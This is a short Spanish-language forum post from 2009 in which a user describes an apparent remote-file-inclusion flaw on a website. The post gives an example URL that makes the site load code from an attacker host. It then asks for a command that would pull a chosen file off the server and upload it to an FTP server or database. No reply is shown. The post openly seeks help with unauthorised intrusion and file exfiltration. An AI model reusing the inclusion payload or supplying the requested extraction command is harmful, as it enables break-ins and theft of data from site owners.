PDA

Ver la versión completa : ejecutar comando en una pagina web



Zelos
18-07-2009, 23:22
Hola, he descubierto una vulnerabilidad en una pagina sql que permitiria la ejecución de comandos en el servidor por ejemplo:
"www.vulnerablesite.com/index.php?page=http://www.attacker.com/attack.txt"

¿Como deberia ser el comando en xml que deberia de subir para extraer un determinado archivo y subirlo a un ftp o a una base de datos? (Suponiendo que yo me sepa todas las carpetas del servidor, que me las sé)
Gracias de antemano chicos! gracias y nos vemos =P